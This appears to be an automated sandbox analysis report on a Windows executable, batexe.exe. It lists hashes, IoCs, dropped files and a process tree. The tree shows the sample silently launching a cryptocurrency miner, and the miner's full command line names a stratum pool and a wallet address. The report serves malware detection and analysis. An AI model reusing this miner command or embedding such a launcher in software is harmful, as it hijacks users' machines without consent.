73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
302s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 14:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2232	b2e.exe
2704	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2704	cpuminer-sse2.exe
2704	cpuminer-sse2.exe
2704	cpuminer-sse2.exe
2704	cpuminer-sse2.exe
2704	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2236-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2236 wrote to memory of 2232	2236	batexe.exe	74
PID 2236 wrote to memory of 2232	2236	batexe.exe	74
PID 2236 wrote to memory of 2232	2236	batexe.exe	74
PID 2232 wrote to memory of 3164	2232	b2e.exe	75
PID 2232 wrote to memory of 3164	2232	b2e.exe	75
PID 2232 wrote to memory of 3164	2232	b2e.exe	75
PID 3164 wrote to memory of 2704	3164	cmd.exe	78
PID 3164 wrote to memory of 2704	3164	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2236
- C:\Users\Admin\AppData\Local\Temp\79F3.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\79F3.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\79F3.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7C15.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3164
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\79F3.tmp\b2e.exe

Filesize
2.4MB

MD5
2acf1c01cfb88b2ba3bd50b7d5258f0c

SHA1
445c58094b45b78483752d1f21662e5c7d4ef689

SHA256
91dbcc9246d650f376b2db9d55189b8e488fc2a9eca1a8b07018d4ff012988a8

SHA512
0404e23af5f7d9051b0b1f67c2fc5e9f254009f0db407adac928559cc6597f65d6d3dd0fdc5f90b304256328a3267ca8e1a09a141e1b2040a9508b01f905cb42

Download Submit
C:\Users\Admin\AppData\Local\Temp\79F3.tmp\b2e.exe

Filesize
2.3MB

MD5
99800054b5f6f429c1cd569948a05394

SHA1
dca3ca884bcd2515084abc312f5835a95d8f56a1

SHA256
b0212200c7e8927d08079bb2328514a027bce3ec71d9af3b7ee9aec3ecbe002f

SHA512
4d34f61cb7f5242cb770b134382f652cba7fdefa916f3b9539b2d9e3b853ddbfbe116702c2556c86c4af24469b83946143280e719b68fada1acc0b3ddbd48c95

Download Submit
C:\Users\Admin\AppData\Local\Temp\7C15.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
f707013cc12d4ea5d61f8a63a521c025

SHA1
6d59155cc80d5696eb2fe5d2d5e7717a0a02dad4

SHA256
2c9ef6f5f3b5beadf72d6bc5cd48cfa0458b94244acffc3ca0009f7cfb3775a2

SHA512
7f79b2d1cdacadcb7ff70fbd00884f23370f773a790731f30429115e840aafb5c219343ff910ea301a0405ba338195f2e2c7b4a72205f19e07837d1b8db5a81f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
669KB

MD5
3e690e6fd9c4959e9bce436d80c9f67c

SHA1
39d3540d2284d928b3aa47442534e41f1c1bbc96

SHA256
65e37c9d7542959a0b479f3c8e03aa29cfba8817925c26c7942838228978f4aa

SHA512
1e273c065dc458258ee1cd021e40ccde014d6e0f79b5ff6c1f263a0fb7fa445e7344f7e5b8f0f36c831e96ead9ffbb0f97be02abe323c4131d48893365833b87

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
954KB

MD5
48a26a00ddd085b3d1a17fb1347515a1

SHA1
e9d885927ea9920499e2b934b0559c7a42ba29fa

SHA256
bee3bb707c42cbfbe9a767624bc491f4cbc9ac7f44b184c5c7d0d483977236cb

SHA512
a2b686edc03791d2fa5d8c94e5f8fcdbb0ff7aa0babe662399d3eb3d7209650be66b4b2d4466f9beb4b3a304f9d99bbc4ea9a51482af742d68f93527e08c29dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
950KB

MD5
80ce4d9670ad0b6ff5e3b89675f6d53d

SHA1
98f3edf4e5ac5c47003ec3554c2f3135351b8ae0

SHA256
c141e3139cf11d4f465129ca94e4e314a3f9e54180a71900d0e6e2bcffea2cf3

SHA512
b7d46a46de580734c8dee61a883120c2ff8d2b41f597f93ec6f57cedf359e729d7118e9ecca49ad479081d64a9a76426f7d6a575d05aa817dc8491c0b0d68a2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
785KB

MD5
4ecedf74ed2aa5f3d21058de1a52d3f3

SHA1
a5a0726ef9bccb3f46b0f19fa21d4e770269c12b

SHA256
29b47eb462889e666bd524d7d7da86af98b723485e5b9f179e11ff7ef79544d1

SHA512
df8f0882e9466e6bcc9f1782aca339ceaa65c09f99ebdfb2e760eaba6fbe2eca2b865cf8e74b415eec88477c7e8ce5678f59cd01cefe8a54bbe53b7439c5a0ff

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
434ad553d959dfc7d01b2322ab5c9498

SHA1
0714b0daff7c96bc79091358c27619118154f65b

SHA256
a1f40651b6036f867bce04a51acb06e445a644c0e3ea75d62250b6512c8b69c9

SHA512
cffbd80c0f173ff734edeab147c5d1d40361b74f38af85252d08a7616ef07d0487c6bdb3eaca10ae98c19d1a03692f34d867704945645e7f75af5144bb9a84d5

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
474KB

MD5
ab84e46a2bbb3158514d016db9bfe4b4

SHA1
8ea00ef30cf002d7608daad2acd139fbd1ff0579

SHA256
b56379b9f431c384484aa040b414bbe8e7edb1954e494ff0926bfb70c24c69c9

SHA512
0f7063764f1c3edcf7490628fc49a89fec1506f2ddc90dbf9c05a130c3afe6346be93f8c159d1a887ae4e63a802f75ac2168358c729a4d038623e008c920f253

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
779KB

MD5
b2966f481ed1e0e99cd5554ccfd1c71f

SHA1
9733cf9e78890cbf08b88e04e08ee500d8377ac7

SHA256
c9bb3c040a514fa7161282e082e46b4ca0b106c11b7e9e5741d66615610d0764

SHA512
9f059bb71c0c27f85128e1a6c40b3d8a1734b5f3943bf2e9895909459be758f0e70c62863337fde62865f2d062cb73ca510e7fd736510f61fb6617e94133e321

Download Submit
memory/2232-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2232-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2236-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2704-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2704-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2704-44-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/2704-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-43-0x0000000051AB0000-0x0000000051B48000-memory.dmp

Filesize
608KB

Download
memory/2704-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2704-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download